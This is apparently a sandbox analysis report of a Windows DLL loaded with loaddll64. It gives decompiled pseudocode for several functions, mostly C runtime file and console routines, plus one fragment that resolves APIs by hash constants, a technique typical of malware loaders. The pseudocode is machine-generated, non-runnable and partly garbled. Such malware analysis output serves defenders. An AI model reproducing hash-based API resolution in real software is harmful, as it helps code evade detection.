                          				_t214 =  *0xd371d458;
                          				_t192 =  *((intOrPtr*)(__rcx));
                          				r13d = r8d;
                          				_t193 = __rcx;
                          				_v72 = _t214;
                          				_v96 = _t192;
                          				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0xd3711c4a;
                          				E0000027E27ED37147B8(0, __rax, __rbx, __rcx, __rdx);
                          				E0000027E27ED371908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
                          				if (_t148 == _t157) goto 0xd3711c63;
                          				_t9 = _t192 + 0x18; // 0x18
                          				 *_t148();
                          				_t65 =  *(_t193 + 0x50) & 0x000000ff;
                          				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0xd3711cdd;
                          				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
                          				_t93 =  *_t188;
                          				if (_t93 == 0) goto 0xd3711c94;
                          				if (_t93 == 0x2f) goto 0xd3711c90;
                          				_t94 =  *((intOrPtr*)(_t188 + 1));
                          				if (_t94 != 0) goto 0xd3711c82;
                          				if (_t94 != 0) goto 0xd3711c97;
                          				_t152 = _t157;
                          				if (_t152 == _t157) goto 0xd3711caf;
                          				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0xd3711caf;
                          				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0xd3711caf;
                          				E0000027E27ED371240C(0, _t157, _t9 + _t188, _t192, _t193);
                          				if (_t152 == _t157) goto 0xd3711cdd;
                          				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
                          				_a8 = 0;
                          				goto 0xd3711ceb;
                          				E0000027E27ED371908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
                          				if (_t152 == _t157) goto 0xd3711d09;
                          				 *_t152();
                          				if (_t152 == _t157) goto 0xd3711ed1;
                          				_t23 =  &_v104; // 0x2
                          				r9d = 0;
                          				r8d = r13d;
                          				_v112 = _t23;
                          				_t25 =  &_v88; // 0x12
                          				_t189 = _a16;
                          				_v120 = _t25;
                          				_t27 =  &_v80; // 0x1a
                          				_t155 = _t27;
                          				_v128 = _t155;
                          				_v136 = 0;
                          				if (E0000027E27ED3715168(_t157, _t193, _t189, _t203) != 0) goto 0xd3711ec1;
                          				_t213 =  *0xd371d458;
                          				E0000027E27ED371908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                          				if (_t155 == _t157) goto 0xd3711d77;
                          				 *_t155();
                          				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0xd3711d8c;
                          				E0000027E27ED371240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
                          				goto 0xd3711d94;
                          				E0000027E27ED371908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                          				if (_t155 == _t157) goto 0xd3711dad;
                          				 *_t155();
                          				if (_a8 == _t157) goto 0xd3711ea1;
                          				E0000027E27ED371908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
                          				if (_t155 == _t157) goto 0xd3711dd5;
                          				r14d =  *_t155();
                          				goto 0xd3711dd8;
                          				r14d = 0;
                          				E0000027E27ED371908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
                          				if (_t155 == _t157) goto 0xd3711df7;
                          				r13d =  *_t155();
                          				goto 0xd3711dfa;
                          				r13d = 0;
                          				_t40 = _t214 + 2; // 0x2
                          				E0000027E27ED371240C(_t213 + _t40, _t157, _t152, _t192, _a8);
                          				if (_t155 == _t157) goto 0xd3711e93;
                          				_t41 = _t213 + 1; // 0x1
                          				r8d = _t41;
                          				 *((char*)(_t189 + _t155)) = 0x2f;
                          				0xd37147b0();
                          				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
                          				_v120 = _a48;
                          				_v128 = _a40;
                          				_v136 = _v104;
                          				if (E0000027E27ED3716518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0xd3711e85;
                          				asm("sbb eax, eax");
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				goto 0xd3711ed6;
                          				return 8;
                          			}





























                          0x27ed3711bfc
                          0x27ed3711bfc
                          0x27ed3711bfc
                          0x27ed3711c01
                          0x27ed3711c15
                          0x27ed3711c1f
                          0x27ed3711c28
                          0x27ed3711c2e
                          0x27ed3711c31
                          0x27ed3711c36
                          0x27ed3711c41
                          0x27ed3711c45
                          0x27ed3711c53
                          0x27ed3711c5b
                          0x27ed3711c5d
                          0x27ed3711c61
                          0x27ed3711c67
                          0x27ed3711c6d
                          0x27ed3711c75
                          0x27ed3711c7c
                          0x27ed3711c80
                          0x27ed3711c85
                          0x27ed3711c8a
                          0x27ed3711c8e
                          0x27ed3711c92
                          0x27ed3711c94
                          0x27ed3711c9a
                          0x27ed3711ca0
                          0x27ed3711ca6
                          0x27ed3711cb6
                          0x27ed3711cc1
                          0x27ed3711cc8
                          0x27ed3711ccc
                          0x27ed3711cdb
                          0x27ed3711cf4
                          0x27ed3711cfc
                          0x27ed3711d07
                          0x27ed3711d0c
                          0x27ed3711d12
                          0x27ed3711d17
                          0x27ed3711d1a
                          0x27ed3711d1d
                          0x27ed3711d22
                          0x27ed3711d27
                          0x27ed3711d2a
                          0x27ed3711d2f
                          0x27ed3711d2f
                          0x27ed3711d37
                          0x27ed3711d3c
                          0x27ed3711d49
                          0x27ed3711d4f
                          0x27ed3711d67
                          0x27ed3711d6f
                          0x27ed3711d75
                          0x27ed3711d7e
                          0x27ed3711d82
                          0x27ed3711d8a
                          0x27ed3711d9d
                          0x27ed3711da5
                          0x27ed3711dab
                          0x27ed3711db0
                          0x27ed3711dc1
                          0x27ed3711dc9
                          0x27ed3711dd0
                          0x27ed3711dd3
                          0x27ed3711dd5
                          0x27ed3711de3
                          0x27ed3711deb
                          0x27ed3711df2
                          0x27ed3711df5
                          0x27ed3711df7
                          0x27ed3711dfa
                          0x27ed3711e02
                          0x27ed3711e0d
                          0x27ed3711e16
                          0x27ed3711e16
                          0x27ed3711e1f
                          0x27ed3711e26
                          0x27ed3711e52
                          0x27ed3711e5e
                          0x27ed3711e67
                          0x27ed3711e6c
                          0x27ed3711e7c
                          0x27ed3711e81
                          0x27ed3711e8d
                          0x27ed3711e9b
                          0x27ed3711eab
                          0x27ed3711ebb
                          0x27ed3711ec9
                          0x27ed3711ecf
                          0x27ed3711eef

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID: uJ$uJ
                          • API String ID: 2332451156-3171342107
                          • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction ID: 9a16677993408a6974cde4da865d15eca391f291ba360b3a5752fd0661f26b72
                          • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction Fuzzy Hash: 5B818E33608A84C6DF30DF66E4582AB67A9B7CEB84F4A5461DE8D47786DE38C445C720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                          • Instruction ID: 5336fff0df82499d9a2f93a7083c9e98d747d60019dfe1a9d206dba996919bf7
                          • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                          • Instruction Fuzzy Hash: EEF06261B19B42A2EF888B21F4943796760FF89BD0F481039D91F46668DF3CEC98C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E00007FF87FF88C084AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                          				char _v64;
                          				signed long long _v72;
                          				intOrPtr _v84;
                          				unsigned int _v88;
                          				intOrPtr _v96;
                          				long long _v100;
                          				signed int _v104;
                          				signed int _v120;
                          				void* __rbp;
                          				void* _t75;
                          				long _t94;
                          				unsigned int _t95;
                          				intOrPtr _t103;
                          				signed int _t124;
                          				intOrPtr _t158;
                          				unsigned long long _t164;
                          				signed int* _t166;
                          				intOrPtr _t169;
                          				unsigned int _t182;
                          				signed short* _t183;
                          				void* _t185;
                          				signed long long _t194;
                          				void* _t195;
                          				signed long long _t197;
                          				signed long long _t198;
                          				signed long long _t200;
                          				void* _t201;
                          				signed short* _t202;
                          
                          				_t192 = __r9;
                          				_t179 = __rdx;
                          				_t167 = __rbx;
                          				_a32 = __rbx;
                          				r15d = r8d;
                          				_t194 = __ecx;
                          				_t183 = __rdx;
                          				if (r8d != 0) goto 0x8c084b26;
                          				goto 0x8c084dc1;
                          				if (__rdx != 0) goto 0x8c084b4a;
                          				E00007FF87FF88C07E680(__rax);
                          				 *__rax = 0;
                          				_t75 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t75);
                          				goto 0x8c084dc1;
                          				r14d = r14d & 0x0000003f;
                          				_t197 = _t194 >> 6;
                          				_t200 = _t194 << 6;
                          				_v72 = _t197;
                          				_t169 =  *((intOrPtr*)(0x8c0b4970 + _t197 * 8));
                          				_t103 =  *((intOrPtr*)(_t169 + _t200 + 0x39));
                          				if (__rbx - 1 - 1 > 0) goto 0x8c084b80;
                          				if (( !r15d & 0x00000001) == 0) goto 0x8c084b2b;
                          				if (( *(_t169 + _t200 + 0x38) & 0x00000020) == 0) goto 0x8c084b96;
                          				_t14 = _t179 + 2; // 0x2
                          				r8d = _t14;
                          				E00007FF87FF88C085D68(0x8c0b4970, _t169, __rdx);
                          				_v88 = _t182;
                          				if (E00007FF87FF88C083EE4(r12d, 0, 0x8c0b4970) == 0) goto 0x8c084cab;
                          				_t158 =  *((intOrPtr*)(0x8c0b4970 + _t197 * 8));
                          				if (( *(0x8c0b4970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x8c084cab;
                          				E00007FF87FF88C07F0D4(_t158, __rbx, _t169, _t179, __r9);
                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) + 0x138)) != _t182) goto 0x8c084bec;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x8c084cab;
                          				if (GetConsoleMode(??, ??) == 0) goto 0x8c084cab;
                          				if (_t103 == 0) goto 0x8c084c8d;
                          				if (_t103 - 1 - 1 > 0) goto 0x8c084d48;
                          				_v104 = _v104 & 0;
                          				_t195 = _t183 + _t201;
                          				_t202 = _t183;
                          				_v100 = 0;
                          				if (_t183 - _t195 >= 0) goto 0x8c084d3e;
                          				r13d =  *_t202 & 0x0000ffff;
                          				if (E00007FF87FF88C08633C(r13w & 0xffffffff) != r13w) goto 0x8c084c7b;
                          				_v100 = 2;
                          				if (r13w != 0xa) goto 0x8c084c70;
                          				r13d = 0xd;
                          				if (E00007FF87FF88C08633C(r13d) != r13w) goto 0x8c084c7b;
                          				_v100 = 2;
                          				if ( &(_t202[1]) - _t195 >= 0) goto 0x8c084c84;
                          				goto 0x8c084c35;
                          				_v104 = GetLastError();
                          				_t198 = _v72;
                          				goto 0x8c084d3e;
                          				r9d = r15d;
                          				E00007FF87FF88C08446C(r12d, 1, __esi, _t167,  &_v104,  &_v64, _t183, _t192);
                          				asm("movsd xmm0, [eax]");
                          				_t124 =  *0x7FF88C0B4978;
                          				goto 0x8c084d43;
                          				if (( *( *((intOrPtr*)(0x8c0b4970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x8c084d0b;
                          				if (3 == 0) goto 0x8c084cf7;
                          				if (3 == 0) goto 0x8c084ce3;
                          				if (2 != 1) goto 0x8c084d48;
                          				r9d = r15d;
                          				E00007FF87FF88C08477C(3, r12d, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				r9d = r15d;
                          				E00007FF87FF88C084898(r12d, _t124, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				r9d = r15d;
                          				E00007FF87FF88C084674(r12d, _t124, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				_v104 = _v104 & _t124;
                          				_v120 = _v120 & 0x8c0b4970;
                          				r8d = r15d;
                          				_v100 = 0x8c0b4970;
                          				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8c084d3b;
                          				_t94 = GetLastError();
                          				_v104 = _t94;
                          				asm("movsd xmm0, [ebp-0x30]");
                          				asm("movsd [ebp-0x20], xmm0");
                          				_t164 = _v88 >> 0x20;
                          				if (_t94 != 0) goto 0x8c084dbc;
                          				_t95 = _v88;
                          				if (_t95 == 0) goto 0x8c084d88;
                          				if (_t95 != 5) goto 0x8c084d7b;
                          				E00007FF87FF88C07E6A0(_t164);
                          				 *_t164 = 9;
                          				E00007FF87FF88C07E680(_t164);
                          				 *_t164 = 5;
                          				goto 0x8c084b42;
                          				E00007FF87FF88C07E630(_v88, _t164, _t167);
                          				goto 0x8c084b42;
                          				_t166 =  *((intOrPtr*)(0x8c0b4970 + _t198 * 8));
                          				if (( *(0x8c0b4970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x8c084da4;
                          				if ( *_t183 == 0x1a) goto 0x8c084b1f;
                          				E00007FF87FF88C07E6A0(_t166);
                          				 *0x8c0b4970 = 0x1c;
                          				E00007FF87FF88C07E680(_t166);
                          				 *_t166 =  *_t166 & 0x00000000;
                          				goto 0x8c084b42;
                          				return _v84 - _v96;
                          			}































                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084b11
                          0x7ff88c084b14
                          0x7ff88c084b17
                          0x7ff88c084b1d
                          0x7ff88c084b21
                          0x7ff88c084b29
                          0x7ff88c084b2b
                          0x7ff88c084b30
                          0x7ff88c084b32
                          0x7ff88c084b37
                          0x7ff88c084b3d
                          0x7ff88c084b45
                          0x7ff88c084b54
                          0x7ff88c084b5b
                          0x7ff88c084b5f
                          0x7ff88c084b63
                          0x7ff88c084b67
                          0x7ff88c084b6b
                          0x7ff88c084b75
                          0x7ff88c084b7e
                          0x7ff88c084b86
                          0x7ff88c084b8d
                          0x7ff88c084b8d
                          0x7ff88c084b91
                          0x7ff88c084b99
                          0x7ff88c084ba4
                          0x7ff88c084bb1
                          0x7ff88c084bbb
                          0x7ff88c084bc1
                          0x7ff88c084bd4
                          0x7ff88c084be6
                          0x7ff88c084c08
                          0x7ff88c084c10
                          0x7ff88c084c17
                          0x7ff88c084c1d
                          0x7ff88c084c20
                          0x7ff88c084c26
                          0x7ff88c084c29
                          0x7ff88c084c2f
                          0x7ff88c084c35
                          0x7ff88c084c46
                          0x7ff88c084c4b
                          0x7ff88c084c53
                          0x7ff88c084c55
                          0x7ff88c084c67
                          0x7ff88c084c6b
                          0x7ff88c084c77
                          0x7ff88c084c79
                          0x7ff88c084c81
                          0x7ff88c084c84
                          0x7ff88c084c88
                          0x7ff88c084c8d
                          0x7ff88c084c9a
                          0x7ff88c084c9f
                          0x7ff88c084ca3
                          0x7ff88c084ca6
                          0x7ff88c084cbc
                          0x7ff88c084cc3
                          0x7ff88c084cc8
                          0x7ff88c084ccd
                          0x7ff88c084ccf
                          0x7ff88c084cdc
                          0x7ff88c084ce1
                          0x7ff88c084ce3
                          0x7ff88c084cf0
                          0x7ff88c084cf5
                          0x7ff88c084cf7
                          0x7ff88c084d04
                          0x7ff88c084d09
                          0x7ff88c084d14
                          0x7ff88c084d19
                          0x7ff88c084d1e
                          0x7ff88c084d24
                          0x7ff88c084d30
                          0x7ff88c084d32
                          0x7ff88c084d38
                          0x7ff88c084d3e
                          0x7ff88c084d43
                          0x7ff88c084d4c
                          0x7ff88c084d52
                          0x7ff88c084d54
                          0x7ff88c084d59
                          0x7ff88c084d5e
                          0x7ff88c084d60
                          0x7ff88c084d65
                          0x7ff88c084d6b
                          0x7ff88c084d70
                          0x7ff88c084d76
                          0x7ff88c084d7e
                          0x7ff88c084d83
                          0x7ff88c084d8f
                          0x7ff88c084d99
                          0x7ff88c084d9e
                          0x7ff88c084da4
                          0x7ff88c084da9
                          0x7ff88c084daf
                          0x7ff88c084db4
                          0x7ff88c084db7
                          0x7ff88c084dd8

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                          • Instruction ID: eef463dae4ee02106e8aeaa2528a0663b53b2f1ec4ff8a3be00073a9f06ac156
                          • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                          • Instruction Fuzzy Hash: AA81A122E1861289FF609BA6D8606BD2BE4FB56BC8F418135DE0E1B799DF3CA445C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 20%
                          			E00007FF87FF88C08446C(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                          				signed long long _v72;
                          				char _v80;
                          				intOrPtr _v87;
                          				char _v88;
                          				long long _v96;
                          				long long _v104;
                          				int _v108;
                          				intOrPtr _v112;
                          				short _v116;
                          				char _v120;
                          				signed long long _v128;
                          				signed long long _v136;
                          				intOrPtr _v144;
                          				signed int _v152;
                          				int _t80;
                          				long _t85;
                          				signed char _t86;
                          				signed long long _t116;
                          				intOrPtr _t120;
                          				long* _t125;
                          				signed long long _t127;
                          				intOrPtr _t136;
                          				signed long long _t140;
                          				void* _t143;
                          				signed long long _t146;
                          				void* _t148;
                          				void* _t156;
                          				void* _t157;
                          				signed long long _t161;
                          
                          				_t127 = __rcx;
                          				_a8 = __rbx;
                          				_t116 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				_v72 = _t116 ^ _t148 - 0x00000080;
                          				r12d = r9d;
                          				_t161 = __edx >> 6;
                          				_t146 = __edx << 6;
                          				_v96 = __r8;
                          				_t125 = __rcx;
                          				_t157 = _t156 + __r8;
                          				_t120 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x28));
                          				_v104 = 0x8c0b4970;
                          				_v108 = GetConsoleCP();
                          				 *__rcx = __rdx;
                          				 *((intOrPtr*)(__rcx + 8)) = 0;
                          				if (__r8 - _t157 >= 0) goto 0x8c08464a;
                          				r13b =  *((intOrPtr*)(__r8));
                          				_v120 = 0;
                          				_t136 =  *((intOrPtr*)(0x8c0b4970 + _t161 * 8));
                          				_t86 =  *(_t136 + _t146 + 0x3d);
                          				if ((_t86 & 0x00000004) == 0) goto 0x8c08451f;
                          				 *(_t136 + _t146 + 0x3d) = _t86 & 0x000000fb;
                          				r8d = 2;
                          				_v88 =  *((intOrPtr*)(_t136 + _t146 + 0x3e));
                          				_v87 = r13b;
                          				goto 0x8c084564;
                          				E00007FF87FF88C081740(_t86 & 0x000000fb, 0, _t120, __rcx, __rcx,  &_v88, __r9);
                          				if (( *(_t120 + _t127 * 2) & 0x00008000) == 0) goto 0x8c08455b;
                          				if (__r8 - _t157 >= 0) goto 0x8c08462a;
                          				r8d = 2;
                          				if (E00007FF87FF88C081654( &_v120, __r8) == 0xffffffff) goto 0x8c08464a;
                          				_t143 = __r8 + 1;
                          				goto 0x8c084576;
                          				r8d = 1;
                          				if (E00007FF87FF88C081654( &_v120, _t143) == 0xffffffff) goto 0x8c08464a;
                          				_v128 = _v128 & 0x00000000;
                          				_v136 = _v136 & 0x00000000;
                          				r9d = 1;
                          				_v144 = 5;
                          				_v152 =  &_v80;
                          				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                          				r14d = _t80;
                          				if (_t80 == 0) goto 0x8c08464a;
                          				_v152 = _v152 & 0x00000000;
                          				_t140 =  &_v80;
                          				r8d = _t80;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c084642;
                          				_t125[1] = _t125[2] - _v96 + __edi;
                          				if (_v112 - r14d < 0) goto 0x8c08464a;
                          				if (r13b != 0xa) goto 0x8c084622;
                          				_t50 = _t140 + 0xd; // 0xd
                          				_v152 = _t140;
                          				_t52 = _t140 + 1; // 0x1
                          				r8d = _t52;
                          				_v116 = _t50;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c084642;
                          				if (_v112 - 1 < 0) goto 0x8c08464a;
                          				_t125[2] = _t125[2] + 1;
                          				_t125[1] = _t125[1] + 1;
                          				goto 0x8c0844e0;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3e)) =  *((intOrPtr*)(_t143 + 1));
                          				 *( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3d) =  *( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3d) | 0x00000004;
                          				_t125[1] = _t125[1] + 1;
                          				goto 0x8c08464a;
                          				_t85 = GetLastError();
                          				 *_t125 = _t85;
                          				E00007FF87FF88C086D80();
                          				return _t85;
                          			}
































                          0x7ff88c08446c
                          0x7ff88c08446c
                          0x7ff88c084486
                          0x7ff88c084490
                          0x7ff88c0844a1
                          0x7ff88c0844a4
                          0x7ff88c0844ab
                          0x7ff88c0844b2
                          0x7ff88c0844b6
                          0x7ff88c0844b9
                          0x7ff88c0844c0
                          0x7ff88c0844c5
                          0x7ff88c0844d1
                          0x7ff88c0844d4
                          0x7ff88c0844da
                          0x7ff88c0844e0
                          0x7ff88c0844e6
                          0x7ff88c0844f0
                          0x7ff88c0844f4
                          0x7ff88c0844f8
                          0x7ff88c0844ff
                          0x7ff88c084508
                          0x7ff88c08450c
                          0x7ff88c084516
                          0x7ff88c084519
                          0x7ff88c08451d
                          0x7ff88c08451f
                          0x7ff88c084530
                          0x7ff88c084535
                          0x7ff88c08453b
                          0x7ff88c084550
                          0x7ff88c084556
                          0x7ff88c084559
                          0x7ff88c08455b
                          0x7ff88c084570
                          0x7ff88c084576
                          0x7ff88c084580
                          0x7ff88c08458d
                          0x7ff88c084593
                          0x7ff88c08459d
                          0x7ff88c0845a5
                          0x7ff88c0845ab
                          0x7ff88c0845b0
                          0x7ff88c0845be
                          0x7ff88c0845c4
                          0x7ff88c0845c8
                          0x7ff88c0845d5
                          0x7ff88c0845df
                          0x7ff88c0845e6
                          0x7ff88c0845ec
                          0x7ff88c0845f2
                          0x7ff88c0845f5
                          0x7ff88c0845fa
                          0x7ff88c0845fa
                          0x7ff88c084602
                          0x7ff88c084614
                          0x7ff88c08461a
                          0x7ff88c08461c
                          0x7ff88c08461f
                          0x7ff88c084625
                          0x7ff88c084630
                          0x7ff88c084638
                          0x7ff88c08463d
                          0x7ff88c084640
                          0x7ff88c084642
                          0x7ff88c084648
                          0x7ff88c084654
                          0x7ff88c084673

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                          • String ID:
                          • API String ID: 3659116390-0
                          • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                          • Instruction ID: d7f5fce0a63d2527628e5392eeff169cbf11d43a884e3325905144419ad754b0
                          • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                          • Instruction Fuzzy Hash: 6151CF32A18A5189EB20CF66E8543AC3BB4FB46BD8F048135CE4A4BB9DDF38D556C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E00007FF87FF88C07F320(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                          				signed long long _t72;
                          				signed long long _t76;
                          				intOrPtr _t78;
                          				signed long long _t80;
                          				signed long long _t89;
                          				struct HINSTANCE__* _t94;
                          				signed long long _t95;
                          				long long _t101;
                          				void* _t105;
                          				signed long long _t109;
                          				signed long long _t111;
                          				signed long long _t114;
                          				struct HINSTANCE__* _t115;
                          				long _t118;
                          				void* _t121;
                          				WCHAR* _t123;
                          
                          				 *((long long*)(_t105 + 8)) = __rbx;
                          				 *((long long*)(_t105 + 0x10)) = _t101;
                          				 *((long long*)(_t105 + 0x18)) = __rsi;
                          				r14d = __ecx;
                          				_t111 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				_t95 = _t94 | 0xffffffff;
                          				_t89 = _t111 ^  *(0x7ff88c070000 + 0x44810 + _t121 * 8);
                          				asm("dec eax");
                          				if (_t89 == _t95) goto 0x8c07f4a1;
                          				if (_t89 == 0) goto 0x8c07f389;
                          				_t72 = _t89;
                          				goto 0x8c07f4a3;
                          				if (__r8 == __r9) goto 0x8c07f435;
                          				_t78 =  *((intOrPtr*)(0x7ff88c070000 + 0x44770 + __rsi * 8));
                          				if (_t78 == 0) goto 0x8c07f3a9;
                          				if (_t78 == _t95) goto 0x8c07f421;
                          				goto 0x8c07f41c;
                          				r8d = 0x800;
                          				LoadLibraryExW(_t123, _t121, _t118);
                          				if (_t72 != 0) goto 0x8c07f3ea;
                          				if (GetLastError() != 0x57) goto 0x8c07f3e8;
                          				r8d = 0;
                          				LoadLibraryExW(??, ??, ??);
                          				_t80 = _t72;
                          				goto 0x8c07f3ea;
                          				if (_t80 != 0) goto 0x8c07f403;
                          				 *((intOrPtr*)(0x7ff88c070000 + 0x44770 + __rsi * 8)) = _t95;
                          				goto 0x8c07f421;
                          				_t19 = 0x7ff88c070000 + 0x44770 + __rsi * 8;
                          				_t76 =  *_t19;
                          				 *_t19 = _t80;
                          				if (_t76 == 0) goto 0x8c07f41c;
                          				FreeLibrary(_t115);
                          				if (_t80 != 0) goto 0x8c07f476;
                          				if (__r8 + 4 != __r9) goto 0x8c07f392;
                          				if (_t80 == 0) goto 0x8c07f486;
                          				GetProcAddress(_t94);
                          				if (_t76 == 0) goto 0x8c07f47f;
                          				_t109 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				asm("dec eax");
                          				 *(0x7ff88c070000 + 0x44810 + _t121 * 8) = _t76 ^ _t109;
                          				goto 0x8c07f4a3;
                          				goto 0x8c07f437;
                          				_t114 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				asm("dec eax");
